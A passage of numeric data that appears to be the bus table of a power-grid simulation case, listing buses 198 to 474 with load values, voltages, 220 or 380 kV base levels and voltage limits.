1.0, 0, 220.0, 0, 1.1, 0.9 ], [198, 1, 46.407029, 9.281406, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [199, 1, 59.747505, 11.949501, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [200, 1, 51.193622, 10.238724, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [201, 1, 0, 0, 0, 0, 0, 0.99965, 0, 380.0, 0, 1.1, 0.9 ], [202, 1, 52.458931, 10.491786, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [203, 1, 6.911935, 1.382387, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [204, 1, 202.587417, 40.517483, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [205, 1, 101.302828, 20.260566, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [206, 1, 48.618278, 9.723656, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [207, 1, 144.569819, 28.913964, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [208, 1, 42.57011, 8.514022, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [209, 1, 59.157578, 11.831516, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [210, 1, 67.960985, 13.592197, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], 
[211, 1, 238.830133, 47.766027, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [212, 1, 59.859404, 11.971881, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [213, 1, 280.607505, 56.121501, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [214, 1, 188.813282, 37.762656, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [215, 1, 399.255108, 79.851022, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [216, 1, 134.623525, 26.924705, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [217, 1, 43.138158, 8.627632, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [218, 1, 131.421902, 26.28438, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [219, 1, 211.211013, 42.242203, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [220, 1, 0, 0, 0, 0, 0, 0.999486, 0, 380.0, 0, 1.1, 0.9 ], [221, 1, 120.48598, 24.097196, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [222, 1, 0.0, 0.0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [223, 1, 119.409064, 23.881813, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [224, 1, 138.856292, 27.771258, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [225, 1, 249.324437, 49.864887, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [226, 1, 87.09673, 17.419346, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [227, 1, 108.504861, 21.700972, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [228, 1, 106.385702, 21.27714, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [229, 1, 235.413415, 47.082683, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [230, 1, 56.465581, 11.293116, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [231, 1, 0, 0, 0, 0, 0, 1.000798, 0, 380.0, 0, 1.1, 0.9 ], [232, 1, 0, 0, 0, 0, 0, 0.999972, 0, 380.0, 0, 1.1, 0.9 ], [233, 1, 0, 0, 0, 0, 0, 0.999753, 0, 380.0, 0, 1.1, 0.9 ], [234, 1, 201.136679, 40.227336, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [235, 1, 65.406967, 13.081393, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [236, 1, 0, 0, 0, 0, 0, 0.999977, 0, 380.0, 0, 1.1, 0.9 ], [237, 1, 0.541317, 0.108263, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [238, 1, 74.009173, 14.801835, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [239, 1, 102.252953, 20.450591, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [240, 1, 644.992017, 
128.998403, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [241, 1, 477.271687, 95.454337, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [242, 1, 173.783258, 34.756652, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [243, 1, 140.208435, 28.041687, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [244, 1, 167.047935, 33.409587, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [245, 1, 0, 0, 0, 0, 0, 1.001539, 0, 380.0, 0, 1.1, 0.9 ], [246, 1, 0, 0, 0, 0, 0, 1.000317, 0, 380.0, 0, 1.1, 0.9 ], [247, 1, 33.149719, 6.629944, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [248, 1, 0, 0, 0, 0, 0, 1.000002, 0, 380.0, 0, 1.1, 0.9 ], [249, 1, 0, 0, 0, 0, 0, 1.000002, 0, 380.0, 0, 1.1, 0.9 ], [250, 1, 0, 0, 0, 0, 0, 1.000004, 0, 380.0, 0, 1.1, 0.9 ], [251, 1, 82.270083, 16.454017, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [252, 1, 210.985127, 42.197025, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [253, 1, 92.630521, 18.526104, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [254, 1, 29.575388, 5.915078, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [255, 1, 145.449295, 29.089859, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [256, 1, 166.805033, 33.361007, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [257, 1, 80.503798, 16.10076, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [258, 1, 262.352157, 52.470431, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [259, 1, 0, 0, 0, 0, 0, 0.99938, 0, 380.0, 0, 1.1, 0.9 ], [260, 1, 163.277677, 32.655535, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [261, 1, 0, 0, 0, 0, 0, 1.001064, 0, 380.0, 0, 1.1, 0.9 ], [262, 1, 0, 0, 0, 0, 0, 1.001157, 0, 380.0, 0, 1.1, 0.9 ], [263, 1, 234.221614, 46.844323, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [264, 1, 303.212513, 60.642503, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [265, 1, 0, 0, 0, 0, 0, 1.000004, 0, 380.0, 0, 1.1, 0.9 ], [266, 1, 146.128233, 29.225647, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [267, 1, 184.82051, 36.964102, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [268, 1, 64.269923, 12.853985, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [269, 1, 51.611158, 10.322232, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [270, 1, 
0, 0, 0, 0, 0, 1.000001, 0, 380.0, 0, 1.1, 0.9 ], [271, 1, 0.0, 0.0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [272, 1, 1.053058, 0.210612, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [273, 1, 144.006139, 28.801228, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [274, 1, 279.928963, 55.985793, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [275, 1, 52.40423, 10.480846, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [276, 1, 204.285011, 40.857002, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [277, 1, 0, 0, 0, 0, 0, 0.999084, 0, 380.0, 0, 1.1, 0.9 ], [278, 1, 159.477848, 31.89557, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [279, 1, 0, 0, 0, 0, 0, 0.99951, 0, 380.0, 0, 1.1, 0.9 ], [280, 1, 0, 0, 0, 0, 0, 0.999206, 0, 380.0, 0, 1.1, 0.9 ], [281, 1, 210.651138, 42.130228, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [282, 1, 297.893332, 59.578666, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [283, 1, 119.408583, 23.881717, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [284, 1, 181.14835, 36.22967, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [285, 1, 80.785809, 16.157162, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [286, 1, 169.314007, 33.862801, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [287, 1, 104.064108, 20.812822, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [288, 1, 66.93331, 13.386662, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [289, 1, 105.266684, 21.053337, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [290, 1, 0, 0, 0, 0, 0, 1.004444, 0, 380.0, 0, 1.1, 0.9 ], [291, 1, 69.274761, 13.854952, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [292, 1, 136.572017, 27.314403, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [293, 1, 120.366084, 24.073217, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [294, 1, 32.075742, 6.415148, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [295, 1, 67.113625, 13.422725, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [296, 1, 190.53574, 38.107148, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [297, 1, 200.2552, 40.05104, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [298, 1, 105.738726, 21.147745, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [299, 1, 102.407253, 20.481451, 0, 0, 0, 
1.0, 0, 380.0, 0, 1.1, 0.9 ], [300, 1, 278.985087, 55.797017, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [301, 1, 0, 0, 0, 0, 0, 0.999382, 0, 380.0, 0, 1.1, 0.9 ], [302, 1, 235.010808, 47.002162, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [303, 1, 120.708367, 24.141673, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [304, 1, 103.652359, 20.730472, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [305, 1, 0, 0, 0, 0, 0, 0.999637, 0, 380.0, 0, 1.1, 0.9 ], [306, 1, 0, 0, 0, 0, 0, 1.00166, 0, 380.0, 0, 1.1, 0.9 ], [307, 1, 122.94133, 24.588266, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [308, 1, 151.57028, 30.314056, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [309, 1, 247.990293, 49.598059, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [310, 1, 0, 0, 0, 0, 0, 0.999933, 0, 380.0, 0, 1.1, 0.9 ], [311, 1, 210.645181, 42.129036, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [312, 1, 94.732999, 18.9466, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [313, 1, 0, 0, 0, 0, 0, 1.000531, 0, 380.0, 0, 1.1, 0.9 ], [314, 1, 293.42253, 58.684506, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [315, 1, 0, 0, 0, 0, 0, 1.001491, 0, 380.0, 0, 1.1, 0.9 ], [316, 1, 114.966762, 22.993352, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [317, 1, 154.798534, 30.959707, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [318, 1, 254.391137, 50.878227, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [319, 1, 9.113308, 1.822662, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [320, 1, 0, 0, 0, 0, 0, 0.999998, 0, 380.0, 0, 1.1, 0.9 ], [321, 1, 215.578803, 43.115761, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [322, 1, 27.444569, 5.488914, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [323, 1, 2.855374, 0.571075, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [324, 1, 504.761011, 100.952202, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [325, 1, 164.428075, 32.885615, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [326, 1, 13.331318, 2.666264, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [327, 1, 114.725093, 22.945019, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [328, 1, 195.509192, 39.101838, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [329, 1, 
294.063253, 58.812651, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [330, 1, 0, 0, 0, 0, 0, 1.001875, 0, 380.0, 0, 1.1, 0.9 ], [331, 1, 23.347622, 4.669524, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [332, 1, 0, 0, 0, 0, 0, 0.999214, 0, 380.0, 0, 1.1, 0.9 ], [333, 1, 245.319649, 49.06393, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [334, 1, 0, 0, 0, 0, 0, 0.99978, 0, 380.0, 0, 1.1, 0.9 ], [335, 1, 250.36721, 50.073442, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [336, 1, 0, 0, 0, 0, 0, 0.998617, 0, 380.0, 0, 1.1, 0.9 ], [337, 1, 99.588735, 19.917747, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [338, 1, 270.297978, 54.059596, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [339, 1, 167.175561, 33.435112, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [340, 1, 141.343558, 28.268712, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [341, 1, 127.7774, 25.55548, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [342, 1, 221.651745, 44.330349, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [343, 1, 121.601379, 24.320276, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [344, 1, 304.883782, 60.976756, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [345, 1, 333.37841, 66.675682, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [346, 1, 330.959769, 66.191954, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [347, 1, 115.742376, 23.148475, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [348, 1, 302.558194, 60.511639, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [349, 1, 0, 0, 0, 0, 0, 1.001645, 0, 380.0, 0, 1.1, 0.9 ], [350, 1, 158.726444, 31.745289, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [351, 1, 0, 0, 0, 0, 0, 1.001546, 0, 380.0, 0, 1.1, 0.9 ], [352, 1, 1050.657046, 210.131409, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [353, 1, 3.158626, 0.631725, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [354, 1, 21.459432, 4.291886, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [355, 1, 0.0, 0.0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [356, 1, 0.0, 0.0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [357, 1, 0.053792, 0.010758, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [358, 1, 0, 0, 0, 0, 0, 1.001214, 0, 380.0, 0, 1.1, 0.9 ], 
[359, 1, 3.140726, 0.628145, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [360, 1, 0, 0, 0, 0, 0, 1.000683, 0, 380.0, 0, 1.1, 0.9 ], [361, 1, 80.384045, 16.076809, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [362, 1, 229.13613, 45.827226, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [363, 1, 337.362642, 67.472528, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [364, 1, 79.596071, 15.919214, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [365, 1, 71.4417, 14.28834, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [366, 1, 141.597221, 28.319444, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [367, 1, 68.442215, 13.688443, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [368, 1, 33.702072, 6.740414, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [369, 1, 27.694123, 5.538825, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [370, 1, 81.53229, 16.306458, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [371, 1, 410.234585, 82.046917, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [372, 1, 237.90093, 47.580186, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [373, 1, 160.53572, 32.107144, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [374, 1, 82.319999, 16.464, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [375, 1, 270.038179, 54.007636, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [376, 1, 296.181024, 59.236205, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [377, 1, 211.942566, 42.388513, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [378, 1, 211.534621, 42.306924, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [379, 1, 72.906923, 14.581385, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [380, 1, 0, 0, 0, 0, 0, 1.00159, 0, 380.0, 0, 1.1, 0.9 ], [381, 1, 243.805196, 48.761039, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [382, 1, 0, 0, 0, 0, 0, 1.000739, 0, 380.0, 0, 1.1, 0.9 ], [383, 1, 0, 0, 0, 0, 0, 0.999102, 0, 380.0, 0, 1.1, 0.9 ], [384, 1, 86.032798, 17.20656, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [385, 1, 108.590275, 21.718055, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [386, 1, 87.24903, 17.449806, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [387, 1, 177.686215, 35.537243, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [388, 1, 
954.172373, 190.834475, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [389, 1, 0, 0, 0, 0, 0, 0.999917, 0, 380.0, 0, 1.1, 0.9 ], [390, 1, 78.783781, 15.756756, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [391, 1, 89.741445, 17.948289, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [392, 1, 172.212932, 34.442586, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [393, 1, 215.061732, 43.012346, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [394, 1, 77.351522, 15.470304, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [395, 1, 107.20443, 21.440886, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [396, 1, 75.931801, 15.18636, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [397, 1, 608.8894, 121.77788, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [398, 1, 263.723152, 52.74463, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [399, 1, 112.36527, 22.473054, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [400, 1, 59.866333, 11.973267, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [401, 1, 0, 0, 0, 0, 0, 1.000626, 0, 380.0, 0, 1.1, 0.9 ], [402, 1, 0, 0, 0, 0, 0, 1.000395, 0, 380.0, 0, 1.1, 0.9 ], [403, 1, 29.725027, 5.945005, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [404, 1, 104.723108, 20.944622, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [405, 1, 789.508705, 157.901741, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [406, 1, 59.818937, 11.963787, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [407, 1, 118.412896, 23.682579, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [408, 1, 342.38369, 68.476738, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [409, 1, 0, 0, 0, 0, 0, 0.999948, 0, 380.0, 0, 1.1, 0.9 ], [410, 1, 44.328383, 8.865677, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [411, 1, 41.914301, 8.38286, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [412, 1, 2.944021, 0.588804, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [413, 1, 146.970835, 29.394167, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [414, 1, 12.479414, 2.495883, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [415, 1, 0, 0, 0, 0, 0, 1.000294, 0, 380.0, 0, 1.1, 0.9 ], [416, 1, 177.719984, 35.543997, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [417, 1, 6.953844, 1.390769, 0, 
0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [418, 1, 144.913917, 28.982783, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [419, 1, 77.455459, 15.491092, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [420, 1, 77.981906, 15.596381, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [421, 1, 112.330948, 22.46619, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [422, 1, 82.297417, 16.459483, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [423, 1, 172.842762, 34.568552, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [424, 1, 12.461518, 2.492304, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [425, 1, 102.340504, 20.468101, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [426, 1, 8.479226, 1.695845, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [427, 1, 71.259552, 14.25191, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [428, 1, 31.950571, 6.390114, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [429, 1, 360.55462, 72.110924, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [430, 1, 192.055045, 38.411009, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [431, 1, 128.430158, 25.686032, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [432, 1, 150.126976, 30.025395, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [433, 1, 76.740908, 15.348182, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [434, 1, 39.939706, 7.987941, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [435, 1, 159.733681, 31.946736, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [436, 1, 85.279132, 17.055826, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [437, 1, 19.421427, 3.884285, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [438, 1, 52.121793, 10.424359, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [439, 1, 97.044042, 19.408808, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [440, 1, 82.012132, 16.402426, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [441, 1, 62.873287, 12.574657, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [442, 1, 83.202642, 16.640528, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [443, 1, 180.391161, 36.078232, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [444, 1, 0, 0, 0, 0, 0, 0.999998, 0, 380.0, 0, 1.1, 0.9 ], [445, 1, 81.967659, 16.393532, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [446, 1, 
38.007668, 7.601534, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [447, 1, 72.260004, 14.452001, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [448, 1, 53.103765, 10.620753, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [449, 1, 267.767161, 53.553432, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [450, 1, 163.860725, 32.772145, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [451, 1, 70.018496, 14.003699, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [452, 1, 0, 0, 0, 0, 0, 0.999998, 0, 380.0, 0, 1.1, 0.9 ], [453, 1, 46.925977, 9.385195, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [454, 1, 32.738657, 6.547731, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [455, 1, 53.377625, 10.675525, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [456, 1, 53.377625, 10.675525, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [457, 1, 163.695791, 32.739158, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [458, 1, 155.695338, 31.139068, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [459, 1, 189.487019, 37.897404, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [460, 1, 249.024982, 49.804996, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [461, 1, 259.039981, 51.807996, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [462, 1, 79.241673, 15.848335, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [463, 1, 40.60393, 8.120786, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [464, 1, 40.65301, 8.130602, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [465, 1, 65.665723, 13.133145, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [466, 1, 53.312259, 10.662452, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [467, 1, 49.198388, 9.839678, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [468, 1, 80.66591, 16.133182, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [469, 1, 49.987048, 9.99741, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [470, 1, 127.297826, 25.459565, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [471, 1, 125.336189, 25.067238, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [472, 1, 43.838821, 8.767764, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [473, 1, 80.498528, 16.099706, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [474, 1, 41.576648, 